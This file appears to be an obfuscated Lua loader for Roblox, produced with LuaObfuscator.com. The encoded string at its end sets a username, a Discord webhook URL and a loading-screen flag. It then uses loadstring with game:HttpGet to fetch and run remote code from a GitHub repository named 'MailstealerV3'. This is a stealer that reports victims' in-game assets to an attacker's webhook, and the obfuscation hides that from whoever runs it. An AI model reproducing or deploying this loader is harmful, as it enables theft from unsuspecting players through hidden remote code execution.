--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v72=0;local v73;while true do if (v72==0) then v73=v2(v0(v30,16));if v19 then local v97=0;local v98;while true do if (v97==1) then return v98;end if (v97==0) then v98=v5(v73,v19);v19=nil;v97=1;end end else return v73;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v74=(v31/(((21 -16) -3)^(v32-(2 -1))))%((3 -1)^(((v33-(1 + (117 -(32 + 85)))) -(v32-(878 -(277 + 5 + 595)))) + (2 -1))) ;return v74-(v74%(1 + 0 + 0)) ;else local v75=(621 -(555 + 64))^(v32-(1066 -(68 + 997))) ;return (((v31%(v75 + v75))>=v75) and 1) or (931 -(857 + 74)) ;end end local function v21()local v34=0 -0 ;local v35;while true do if (v34==(1 -0)) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (351 -(87 + 263)) ;v34=958 -(892 + 65) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 2 + 0 ;return (v37 * (1017 -761)) + v36 ;end local function v23()local v38=952 -(468 + 334 + 150) ;local v39;local v40;local v41;local v42;while true do if (v38==1) then return (v42 * (45169940 -28392724)) + (v41 * (118879 -53343)) + (v40 * 256) + v39 ;end if (v38==(0 + 0)) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + (1001 -(915 + (107 -25))) ;v38=2 -1 ;end end end local function v24()local v43=1187 -(1069 + 118) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if ((4 -2)==v43) then v48=v20(v45,21,67 -36 );v49=((v20(v45,32)==1) and  -(1 + 0)) or ((860 -(814 + 45)) -(0 -0)) ;v43=3 + 0 ;end if (v43==(794 -(368 + 423))) then if (v48==0) then if (v47==(0 + 0)) then return v49 * (0 -0) ;else local v99=0;while true do if (v99==(18 -(10 + 8))) then v48=3 -2 ;v46=442 -(416 + 26) ;break;end end end elseif (v48==(6535 -4488)) then return ((v47==(0 + 0 + 0)) and (v49 * ((886 -(261 + 624))/0))) or (v49 * NaN) ;end return v8(v49,v48-(1809 -786) ) * (v46 + (v47/((440 -(145 + 293))^(482 -(44 + 386))))) ;end if (v43==(1486 -((1773 -775) + 488))) then v44=v23();v45=v23();v43=1 + 0 ;end if (v43==(1 + 0)) then v46=773 -(201 + 571) ;v47=(v20(v45,(2219 -(1020 + 60)) -((1539 -(630 + 793)) + 1022) ,83 -63 ) * ((2 + 0)^(116 -84))) + v44 ;v43=7 -5 ;end end end local function v25(v50)local v51;if  not v50 then v50=v23();if (v50==(0 -0)) then return "";end end v51=v3(v16,v18,(v18 + v50) -(1 + 0) );v18=v18 + v50 ;local v52={};for v70=3 -2 , #v51 do v52[v70]=v2(v1(v3(v51,v70,v70)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=1246 -(383 + 863) ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;local v62;while true do if (v53==(324 -(196 + 126))) then v58=nil;v59=nil;v53=3 -0 ;end if (v53==(1 + 0)) then v56=nil;v57=nil;v53=2 -0 ;end if (v53==(985 -(18 + 964))) then v60=nil;v61=nil;v53=14 -10 ;end if (v53==(52 -(25 + 23))) then v62=nil;while true do if (v54==(1 + 1)) then v59=nil;v60=nil;v54=2 + 1 ;end if (3==v54) then v61=nil;v62=nil;v54=4;end if (v54==(1 + 0)) then local v95=732 -(16 + 716) ;while true do if (v95==(0 -0)) then v57=nil;v58=nil;v95=851 -(20 + 830) ;end if (v95~=(1 + 0)) then else v54=128 -(116 + 10) ;break;end end end if (v54==(9 -5)) then while true do if (v55==(0 + 0)) then local v106=738 -(542 + 196) ;while true do if (v106~=(285 -(175 + 110))) then else v56=0 -0 ;v57=nil;v106=1 -0 ;end if (v106~=(1 + 0)) then else v55=1;break;end end end if (v55~=(2 + 0)) then else local v107=0 + 0 ;local v108;while true do if (v107~=(0 + 0)) then else v108=0 -0 ;while true do if (v108~=(0 -0)) then else local v127=0 + 0 ;while true do if (v127~=1) then else v108=1552 -(1126 + 425) ;break;end if (v127~=0) then else v60=nil;v61=nil;v127=406 -(118 + 287) ;end end end if (v108~=(1 + 0)) then else v55=11 -8 ;break;end end break;end end end if (v55==(1124 -(118 + 1003))) then v62=nil;while true do local v110=0;while true do if (v110~=(0 -0)) then else local v112=0 -0 ;while true do if (v112~=(377 -(142 + 235))) then else local v136=0 + 0 ;while true do if (v136==0) then if (v56==1) then local v159=0;local v160;while true do if ((0 -0)~=v159) then else v160=0 + 0 ;while true do if (v160==(1 -0)) then v62={};v56=2;break;end if (v160~=(977 -(553 + 424))) then else local v179=0 -0 ;while true do if ((1 + 0)==v179) then v160=1 + 0 ;break;end if (v179==0) then v60={v57,v58,nil,v59};v61=v23();v179=1 + 0 ;end end end end break;end end end if (v56==(2 + 1)) then local v161=0 + 0 ;while true do if ((0 -0)~=v161) then else local v168=0 -0 ;while true do if (v168~=0) then else local v180=0 + 0 ;while true do if (v180==(0 -0)) then for v182=1,v23() do v58[v182-1 ]=v28();end return v60;end end end end end end end v136=4 -3 ;end if (v136~=(3 -2)) then else v112=1;break;end end end if ((1 + 0)~=v112) then else v110=407 -(183 + 223) ;break;end end end if ((1 -0)==v110) then if (v56~=(9 -7)) then else local v128=753 -(239 + 514) ;local v129;while true do if ((0 + 0)==v128) then v129=0;while true do if (v129~=(1330 -(797 + 532))) then else for v163=1 + 0 ,v23() do local v164=0;local v165;local v166;local v167;while true do if (v164~=(337 -(10 + 327))) then else v165=0;v166=nil;v164=1;end if (v164~=(1 + 0)) then else v167=nil;while true do if (v165==(0 + 0)) then local v181=0;while true do if ((2 -1)==v181) then v165=1 + 0 ;break;end if (v181==0) then v166=1202 -(373 + 829) ;v167=nil;v181=1;end end end if (v165==(732 -(476 + 255))) then while true do if (v166==0) then v167=v21();if (v20(v167,1,1)==(1130 -(369 + 761))) then local v185=0 + 0 ;local v186;local v187;local v188;local v189;while true do if (v185==(1 + 1)) then while true do if (v186~=(12 -9)) then else if (v20(v188,5 -2 ,5 -2 )~=(239 -(64 + 174))) then else v189[2 + 2 ]=v62[v189[4]];end v57[v163]=v189;break;end if (v186==(1 + 1)) then local v199=0 -0 ;while true do if (v199==(336 -(144 + 192))) then local v208=216 -(42 + 174) ;local v209;while true do if (v208==(0 + 0)) then v209=0 + 0 ;while true do if ((0 + 0)==v209) then if (v20(v188,1,1 + 0 )==(1505 -(363 + 1141))) then v189[2]=v62[v189[4 -2 ]];end if (v20(v188,2 + 0 ,1582 -(1183 + 397) )==(2 -1)) then v189[3 + 0 ]=v62[v189[3]];end v209=1 + 0 ;end if ((1791 -(1010 + 780))~=v209) then else v199=1 + 0 ;break;end end break;end end end if (v199==1) then v186=3;break;end end end if (v186~=(0 -0)) then else local v200=0;local v201;while true do if (v200~=(1975 -(1913 + 62))) then else v201=0 + 0 ;while true do if (v201==(1837 -(1045 + 791))) then v186=2 -1 ;break;end if (v201==(0 -0)) then local v211=0;local v212;while true do if (v211==(1933 -(565 + 1368))) then v212=0 -0 ;while true do if (v212~=0) then else local v220=1661 -(1477 + 184) ;while true do if (v220==0) then v187=v20(v167,1576 -(1281 + 293) ,269 -(28 + 238) );v188=v20(v167,8 -4 ,7 -1 );v220=1;end if (v220~=(1 + 0)) then else v212=1 + 0 ;break;end end end if (1==v212) then v201=857 -(564 + 292) ;break;end end break;end end end end break;end end end if (v186==(1 -0)) then local v202=0 -0 ;local v203;local v204;while true do if (v202~=(1 + 0)) then else while true do if ((470 -(381 + 89))~=v203) then else v204=0 -0 ;while true do if (v204==(305 -(244 + 60))) then v186=2;break;end if (v204==(0 + 0)) then local v214=1156 -(1074 + 82) ;local v215;while true do if (v214~=(476 -(41 + 435))) then else v215=1784 -(214 + 1570) ;while true do if (v215~=1) then else v204=1;break;end if (v215==0) then local v221=1455 -(990 + 465) ;while true do if (v221==(1002 -(938 + 63))) then v215=1 + 0 ;break;end if (v221~=(0 + 0)) then else v189={v22(),v22(),nil,nil};if (v187==(1726 -(1668 + 58))) then local v222=1613 -(1565 + 48) ;while true do if (v222==(0 + 0)) then v189[1141 -(782 + 356) ]=v22();v189[271 -(176 + 91) ]=v22();break;end end elseif (v187==(2 -1)) then v189[3]=v23();elseif (v187==(2 -0)) then v189[3]=v23() -((1094 -(975 + 117))^(1891 -(157 + 1718))) ;elseif (v187~=(3 + 0)) then else local v227=0 + 0 ;local v228;while true do if (v227==(0 -0)) then v228=0;while true do if (v228==(1994 -(109 + 1885))) then v189[10 -7 ]=v23() -((1471 -(1269 + 200))^(30 -14)) ;v189[4]=v22();break;end end break;end end end v221=3 -2 ;end end end end break;end end end end break;end end break;end if (v202~=0) then else v203=1018 -(697 + 321) ;v204=nil;v202=2 -1 ;end end end end break;end if (1==v185) then local v192=0 -0 ;local v193;while true do if (v192~=0) then else v193=0 -0 ;while true do if ((1 + 0)==v193) then v185=3 -1 ;break;end if (v193==(0 -0)) then v188=nil;v189=nil;v193=1228 -(322 + 905) ;end end break;end end end if ((611 -(602 + 9))~=v185) then else local v194=0 + 0 ;while true do if ((1190 -(449 + 740))~=v194) then else v185=1;break;end if (v194~=(0 + 0)) then else local v205=0 -0 ;while true do if (v205~=(872 -(826 + 46))) then else v186=0 + 0 ;v187=nil;v205=1 + 0 ;end if (v205~=(948 -(245 + 702))) then else v194=1;break;end end end end end end end break;end end break;end end break;end end end v56=9 -6 ;break;end if (v129==(0 + 0)) then local v162=0;while true do if (v162==(0 + 0)) then for v172=1434 -(797 + 636) ,v61 do local v173=0;local v174;local v175;local v176;local v177;local v178;while true do if (v173==(4 -3)) then v176=nil;v177=nil;v173=1900 -(260 + 1638) ;end if (v173~=(442 -(382 + 58))) then else v178=nil;while true do if (v174~=0) then else local v184=0 -0 ;while true do if ((1 + 0)==v184) then v174=1;break;end if (v184==0) then v175=0 -0 ;v176=nil;v184=2 -1 ;end end end if ((5 -3)~=v174) then else while true do if ((1206 -(902 + 303))~=v175) then else v178=nil;while true do if (v176==1) then if (v177==(1 -0)) then v178=v21()~=(326 -(192 + 134)) ;elseif (v177==2) then v178=v24();elseif (v177==(6 -3)) then v178=v25();end v62[v172]=v178;break;end if ((0 + 0)~=v176) then else local v196=0 + 0 ;local v197;while true do if (v196==0) then v197=0 + 0 ;while true do if (v197~=(1691 -(1121 + 569))) then else v176=1;break;end if (v197==0) then local v210=0 + 0 ;while true do if (v210~=1) then else v197=3 -2 ;break;end if (v210==(214 -(22 + 192))) then local v213=683 -(483 + 200) ;while true do if ((1463 -(1404 + 59))~=v213) then else v177=v21();v178=nil;v213=2 -1 ;end if ((4 -3)==v213) then v210=1 -0 ;break;end end end end end end break;end end end end break;end if (v175~=(765 -(468 + 297))) then else local v190=562 -(334 + 228) ;local v191;while true do if ((0 -0)==v190) then v191=0 -0 ;while true do if (v191~=1) then else v175=1 -0 ;break;end if (v191~=0) then else v176=0 + 0 ;v177=nil;v191=237 -(141 + 95) ;end end break;end end end end break;end if (v174~=(1 + 0)) then else v177=nil;v178=nil;v174=4 -2 ;end end break;end if (v173==(0 -0)) then v174=0 -0 ;v175=nil;v173=1 + 0 ;end end end v60[1 + 2 ]=v21();v162=2 -1 ;end if (v162==1) then v129=1;break;end end end end break;end end end if (v56~=(0 + 0)) then else local v130=0 + 0 ;local v131;local v132;while true do if (v130~=(0 + 0)) then else v131=0;v132=nil;v130=1 + 0 ;end if ((1 -0)~=v130) then else while true do if ((0 + 0)~=v131) then else v132=163 -(92 + 71) ;while true do if (v132==(0 + 0)) then local v170=0;local v171;while true do if (v170~=(0 + 0)) then else v171=0;while true do if (v171==1) then v132=1 -0 ;break;end if (v171==0) then v57={};v58={};v171=1;end end break;end end end if (v132==(766 -(574 + 191))) then v59={};v56=1773 -(1733 + 39) ;break;end end break;end end break;end end end break;end end end break;end if (v55~=(1 + 0)) then else local v109=0 -0 ;while true do if (v109~=0) then else local v111=0 -0 ;while true do if (v111~=(1 + 0)) then else v109=1949 -(1096 + 852) ;break;end if (v111~=(849 -(254 + 595))) then else v58=nil;v59=nil;v111=1 + 0 ;end end end if (v109~=(127 -(55 + 71))) then else v55=2 -0 ;break;end end end end break;end if (v54==(1790 -(573 + 1217))) then local v96=236 -(46 + 190) ;while true do if (v96~=(2 -1)) then else v54=1;break;end if (v96==(95 -(51 + 44))) then v55=0 + 0 ;v56=nil;v96=1 + 0 ;end end end end break;end if (v53~=0) then else v54=0 -0 ;v55=nil;v53=727 -(228 + 498) ;end end end local function v29(v63,v64,v65)local v66=0;local v67;local v68;local v69;while true do if (v66==0) then v67=v63[1];v68=v63[2];v66=1;end if (v66==1) then v69=v63[3];return function(...)local v79=v67;local v80=v68;local v81=v69;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do local v94=0;while true do if (v94==0) then v91=v79[v83];v92=v91[1];v94=1;end if (v94==1) then if (v92<=4) then if (v92<=1) then if (v92>0) then local v113=v91[2];v89[v113]=v89[v113](v13(v89,v113 + 1 ,v84));elseif ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v65;else v89[v91[2]]=v65[v91[3]];end elseif (v92<=2) then local v115=v91[2];local v116,v117=v82(v89[v115](v13(v89,v115 + 1 ,v91[3])));v84=(v117 + v115) -1 ;local v118=0;for v133=v115,v84 do v118=v118 + 1 ;v89[v133]=v116[v118];end elseif (v92>3) then v89[v91[2]]=v91[3];else do return;end end elseif (v92<=6) then if (v92>5) then v65[v91[3]]=v89[v91[2]];else local v121=v91[2];local v122=v89[v91[3]];v89[v121 + 1 ]=v122;v89[v121]=v122[v91[4]];end elseif (v92<=7) then v89[v91[2]]=v91[3]~=0 ;elseif (v92==8) then v89[v91[2]]();else local v142;local v143;v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v65[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v65[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3]~=0 ;v83=v83 + 1 ;v91=v79[v83];v65[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];if ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v65;else v89[v91[2]]=v65[v91[3]];end v83=v83 + 1 ;v91=v79[v83];if ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v65;else v89[v91[2]]=v65[v91[3]];end v83=v83 + 1 ;v91=v79[v83];v143=v91[2];v142=v89[v91[3]];v89[v143 + 1 ]=v142;v89[v143]=v142[v91[4]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];end v83=v83 + 1 ;break;end end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!093O0003083O00557365726E616D65030B3O00417273322O30326C69666503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313938363437352O313938343931303337362F5A74654D52486E4668306D4B455F36374F443736434F76444F62413475636A4533714F426E6F544B4554412D4D7967765037487832486D495867423031537339416A5242030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F4D61696C737465616C657256332F6D61696E2F6D61696E000E3O0012093O00023O00124O00013O00124O00043O00124O00038O00013O00124O00053O00124O00063O00122O000100073O00202O00010001000800122O000300094O0002000100034O00015O00022O00083O000100012O00033O00017O00",v9(),...);
